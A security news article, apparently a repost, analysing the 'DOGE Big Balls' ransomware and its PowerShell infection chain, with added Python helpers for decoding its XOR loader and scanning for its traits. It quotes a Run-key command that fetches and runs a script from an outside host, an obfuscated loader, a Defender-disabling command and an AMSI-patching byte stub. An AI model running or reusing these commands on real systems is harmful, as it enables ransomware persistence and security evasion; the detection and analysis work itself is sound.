New DOGE Big Balls ransomware uses open-source tools and custom scripts to infect victim machines
Summary: describes a new ransomware variant named "DOGE Big Balls", developed from the Fog family, which uses a complex multi-stage infection chain combining custom PowerShell scripts and open-source tools. Its payload and ransom notes contain political statements and references to public figures, suggesting an ideological motive. Likely delivery vectors include phishing e-mail and vulnerability exploitation; once executed, the ransomware progressively establishes persistence, steals credentials and encrypts data. Researchers found it using new tools and techniques. 2025-5-8 14:20:48 Author: cybersecuritynews.com

New DOGE Big Balls Ransomware Using Open-Source Tools & Custom Scripts to Infect Victim Machines

Cybersecurity researchers have identified a sophisticated new ransomware variant called “DOGE Big Balls,” which appears to be a modified version of the existing Fog ransomware family.

The malware, provocatively named after the Department of Government Efficiency (DOGE), employs a complex multi-stage infection chain utilizing both custom-developed PowerShell scripts and well-known open-source tools to compromise victim systems.

Throughout its payload files and ransom notes, the malware includes political statements, references to public figures, and links to YouTube videos, suggesting potential ideological motivations behind the attacks.


Initial infection vectors remain unconfirmed, though analysts suspect the distribution methods include phishing emails and exploitation of vulnerable exposed services.

Once executed, the ransomware deploys an intricate attack chain that progressively establishes persistence, performs credential theft, achieves lateral movement, and ultimately encrypts victim data.

The malware operators frequently update their tools and scripts hosted on Netlify, demonstrating an active development cycle and operational security awareness.

Netskope researchers identified the threat during routine hunting activities when they discovered a previously unreported payload connected to DOGE Big Balls ransomware.

Their analysis revealed an arsenal of new tools not documented in previous reports from other security vendors, including Trend Micro, Cyble, and The DFIR Report, all of which had previously tracked this threat actor.

The infection chain begins with an MSI installer file that executes an obfuscated PowerShell script. This initial script is obfuscated by XORing its contents with a single-byte key and base64-encoding the result, a pattern repeated across many of the malware’s components.

PowerShell script (Source – Netskope)

The payload.msi file’s CustomAction table contains an entry that runs PowerShell with the execution policy bypassed and no visible window: powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File wix.ps1.

The wix.ps1 script, once decoded, reveals code that checks for administrator privileges and creates persistence mechanisms by adding an LNK file named “EdgeAutoUpdater.lnk” to the Windows Startup directory.

The script also establishes a scheduled task named “EdgeAutoUpdater Task” that runs at midnight to ensure the malware’s stage1.ps1 script is downloaded and executed, even if the initial infection is interrupted.

Infection Mechanism Deep Dive

The stage1.ps1 script is the orchestrator of the infection: it downloads and executes the numerous additional components that follow.

It first creates a directory under the Windows Startup folder and sets the hidden attribute on it to conceal its presence. It then attempts to disable Windows Defender protections; those commands are not present in clear text but are unpacked at run time by stanzas of the following form:

# Single-byte XOR key and the base64-wrapped, XORed UTF-16LE command
$key = 97; $encoded = "QmFBYV [...redacted...] rYWth";
$xorBytes = [Convert]::FromBase64String($encoded);
# Undo the XOR byte by byte ($_ is the current pipeline byte)
$bytes = $xorBytes | ForEach-Object { $_ -bxor $key };
# The plaintext is UTF-16LE ("Unicode" in .NET); evaluate it in place
$cmd = [System.Text.Encoding]::Unicode.GetString($bytes);
Invoke-Expression $cmd

This obfuscation keeps the real command out of the script text, so string-based detection that looks at the file on disk never sees it; the command only exists in memory once Invoke-Expression runs. The stage1.ps1 script also downloads and executes various tools with names like cwiper.exe, ktool.exe, sh.exe, and others.
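The same unwrapping, written as an analyst helper in Python. This is an added example, not Netskope’s code or the malware’s, and the stanza it decodes is constructed here around a stand-in command rather than the article’s redacted blob. Besides replaying the loader, it shows a check the stanza gives away for free: because the loader decodes with [Text.Encoding]::Unicode, every odd plaintext byte of an ASCII command is 0x00, so the key can be read straight off the odd ciphertext bytes without trusting the $key literal.

```python
"""Decoder for the XOR-then-base64 wrapper used by the stage scripts.

Added analyst helper, not code from Netskope or from the malware. SAMPLE_STAGE
below is constructed by xor_wrap() around a stand-in command; it is not the
redacted blob printed in the article.
"""
import base64
import re
from collections import Counter
from typing import List, Optional, Tuple

# Loader stanza shape from the article: $key = N; $encoded = "<base64>"
LOADER_RE = re.compile(r'\$key\s*=\s*(\d+)\s*;\s*\$encoded\s*=\s*"([A-Za-z0-9+/=]+)"')


def xor_wrap(command: str, key: int) -> str:
    """Mirror of the packing step: UTF-16LE text, XOR every byte with key, base64."""
    raw = command.encode("utf-16-le")
    return base64.b64encode(bytes(b ^ key for b in raw)).decode("ascii")


def recover_key(xor_bytes: bytes) -> int:
    """Recover the single-byte key without reading the $key literal.

    The loader decodes with [Text.Encoding]::Unicode, i.e. UTF-16LE. For ASCII
    text every odd plaintext byte is 0x00, so every odd ciphertext byte is the
    key itself; anything else means the blob is not XORed UTF-16LE ASCII.
    """
    odd = xor_bytes[1::2]
    if not odd:
        raise ValueError("blob too short to analyse")
    key, count = Counter(odd).most_common(1)[0]
    if count < 0.9 * len(odd):
        raise ValueError("odd bytes are not constant; not XORed UTF-16LE ASCII")
    return key


def unwrap(encoded: str, key: Optional[int] = None) -> Tuple[int, str]:
    """base64-decode, XOR with key (recovered if not given), decode UTF-16LE."""
    xor_bytes = base64.b64decode(encoded)
    if key is None:
        key = recover_key(xor_bytes)
    plain = bytes(b ^ key for b in xor_bytes)
    return key, plain.decode("utf-16-le")


def decode_stage(script: str) -> List[Tuple[int, int, str]]:
    """Find every loader stanza in a script and decode it.

    Returns (declared_key, recovered_key, command) per stanza. The recovered
    key comes from the ciphertext alone, so a mismatch with the declared one
    means the stanza would not decode as written and deserves a second look.
    """
    results = []
    for m in LOADER_RE.finditer(script):
        declared = int(m.group(1))
        recovered, command = unwrap(m.group(2))
        results.append((declared, recovered, command))
    return results


# Constructed sample: the stanza shape from the article wrapping a stand-in
# Defender-tampering command of the kind the article says stage1.ps1 runs.
SAMPLE_COMMAND = "Set-MpPreference -DisableRealtimeMonitoring $true"
SAMPLE_STAGE = (
    '$key = 97; $encoded = "' + xor_wrap(SAMPLE_COMMAND, 97) + '";\n'
    "$xorBytes = [Convert]::FromBase64String($encoded);\n"
    "$bytes = $xorBytes | ForEach-Object { $_ -bxor $key };\n"
    "$cmd = [System.Text.Encoding]::Unicode.GetString($bytes);\n"
    "Invoke-Expression $cmd\n"
)

if __name__ == "__main__":
    for declared, recovered, command in decode_stage(SAMPLE_STAGE):
        print(f"declared key {declared}, recovered key {recovered}: {command}")
```

Run decode_stage() over a captured stage1.ps1 to list every unpacked command at once; the 0.9 threshold in recover_key() tolerates a few non-ASCII characters (quotes, dashes) in the plaintext while still rejecting blobs that were not packed this way.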

Notably, the ktool.exe component uses the BYOVD (Bring Your Own Vulnerable Driver) technique, loading a driver vulnerable to CVE-2015-2291 (an Intel Ethernet diagnostics driver), to deploy a Havoc Demon agent for persistence and remote access.

The amsibypass.ps1 component targets the Windows Antimalware Scan Interface by patching the AmsiScanBuffer function in memory, overwriting the start of the function with instructions that make it return immediately with 0x80070057 (E_INVALIDARG). The scan therefore fails instead of reporting a detection, and the caller treats the buffer as clean.

This evasion allows script content subsequently loaded in that PowerShell process to run without being scanned by AMSI-integrated security products.

To survive reboots, the script also writes a Run key value under HKLM that re-downloads and runs stage1.ps1 at logon, for example:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v UpdaterService /t REG_SZ /d "powershell -windowstyle hidden ExecutionPolicy Bypass iwr -uri gentle-chebakia-da1172.netlify.app/stage1.ps1 | IEX" /f
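A heuristic scanner for the traits described in this section and in the AMSI patch above, as an added example that is not Netskope’s or any vendor’s detection content. It takes a command line or script body and reports which traits fire: a hidden window plus execution-policy bypass, an iwr | IEX download cradle, Run-key, Startup-folder or scheduled-task persistence, and the AmsiScanBuffer patch, the last recognised by decoding byte-array literals and looking for the mov eax, 0x80070057 opcodes. The Run-key sample is the command quoted above; the other samples and all rule names are constructed stand-ins, and the exact syntax of the wix.ps1 persistence and the amsibypass.ps1 patch is assumed rather than taken from the article.

```python
"""Heuristic scanner for the persistence and evasion traits this article lists.

Added example, not Netskope's or any vendor's detection logic. Rule names and
sample inputs are constructed here; RUN_KEY_CMD is the command quoted in the
article, the other samples are stand-ins shaped like what the article describes.
"""
import re
from typing import List

# PowerShell is case-insensitive, so every text rule is compiled with re.I.
RULES = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden\b",
    "exec_policy_bypass": r"(?:-?ExecutionPolicy|-ep|-ex|-exec)\s+Bypass\b",
    "download_cradle": (
        r"(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b"
        r"[^\n]*\|\s*(?:iex|Invoke-Expression)\b"
        r"|(?:iex|Invoke-Expression)\s*\(?[^\n]*"
        r"(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b"
    ),
    "run_key_persistence": r"CurrentVersion\\Run(?:Once)?\b",
    "startup_folder_persistence": (
        r"\\Start Menu\\Programs\\Startup\b"
        r"|GetFolderPath\(\s*['\"]?Startup['\"]?\s*\)"
        r"|SpecialFolder\]::Startup\b"
    ),
    "scheduled_task": r"\bschtasks(?:\.exe)?\s+/create\b|\bRegister-ScheduledTask\b",
    "amsi_reference": r"\bAmsi(?:ScanBuffer|ScanString|Utils|Context|InitFailed)\b|\bamsi\.dll\b",
    "memory_patch_api": r"\bVirtualProtect\b|Marshal\]::Copy\b|\bWriteProcessMemory\b",
}
COMPILED = {name: re.compile(pat, re.I) for name, pat in RULES.items()}

# Comma-separated byte literals such as (0xB8, 0x57, 0x00, ...) or 184,87,0,...
BYTE_SEQ_RE = re.compile(
    r"(?:0x[0-9A-Fa-f]{1,2}|\b\d{1,3}\b)(?:\s*,\s*(?:0x[0-9A-Fa-f]{1,2}|\d{1,3}\b))+"
)
# x64 "mov eax, 0x80070057" (B8 57 00 07 80) followed by "ret" (C3); the x86
# variant ends in "ret 0x18" (C2 18 00) instead, so only the shared mov is matched.
AMSI_STUB_PREFIX = bytes.fromhex("b857000780")


def byte_arrays(text: str) -> List[bytes]:
    """Parse every numeric literal run into bytes; runs with values > 255 are skipped."""
    out = []
    for m in BYTE_SEQ_RE.finditer(text):
        vals = [int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)
                for tok in re.split(r"\s*,\s*", m.group(0))]
        if all(0 <= v <= 255 for v in vals):
            out.append(bytes(vals))
    return out


def scan(text: str) -> List[str]:
    """Return the sorted rule names that fire on a command line or script body."""
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    if any(AMSI_STUB_PREFIX in arr for arr in byte_arrays(text)):
        hits.add("amsi_patch_stub")
    return sorted(hits)


# Sample 1: the Run-key command quoted in the article.
RUN_KEY_CMD = (
    r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v UpdaterService '
    r'/t REG_SZ /d "powershell -windowstyle hidden ExecutionPolicy Bypass '
    r'iwr -uri gentle-chebakia-da1172.netlify.app/stage1.ps1 | IEX" /f'
)
# Sample 2 (constructed): stand-in for the amsibypass.ps1 behaviour the article
# describes; the P/Invoke wrapper name [Win32] is assumed.
AMSI_PATCH_SNIPPET = """
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
$old = 0
[Win32]::VirtualProtect($ptr, [uint32]6, 0x40, [ref]$old)
$patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $ptr, 6)
"""
# Sample 3 (constructed): stand-in for the wix.ps1 persistence (Startup LNK and
# midnight task); the schtasks syntax and the script path are assumed.
STARTUP_SNIPPET = r"""
$lnk = Join-Path ([Environment]::GetFolderPath("Startup")) "EdgeAutoUpdater.lnk"
schtasks /create /tn "EdgeAutoUpdater Task" /sc daily /st 00:00 /tr "powershell -w hidden -ep bypass -File stage1.ps1" /f
"""
# Sample 4 (constructed): an ordinary admin command line that should stay quiet.
BENIGN_CMD = r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"

if __name__ == "__main__":
    for label, sample in [("run key", RUN_KEY_CMD), ("amsi patch", AMSI_PATCH_SNIPPET),
                          ("startup", STARTUP_SNIPPET), ("benign", BENIGN_CMD)]:
        print(f"{label:10s} -> {scan(sample)}")
```

The rules are deliberately loose (short aliases such as -w, -ep and irm are accepted) because the operator controls the exact spelling; the stub check is the one high-confidence signal, since a byte array containing B8 57 00 07 80 has no benign reason to appear next to an AmsiScanBuffer reference. Feed it Sysmon process-creation command lines and ScriptBlock log text alike.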

According to Netskope’s latest report, the ransomware operators have enhanced their toolkit with additional components, including cryptocurrency mining software and advanced credential harvesting tools, demonstrating the threat actor’s evolving capabilities and financial motivations beyond traditional ransomware operations.



Source: https://cybersecuritynews.com/new-doge-big-balls-ransomware-using-open-source-tools-custom-scripts/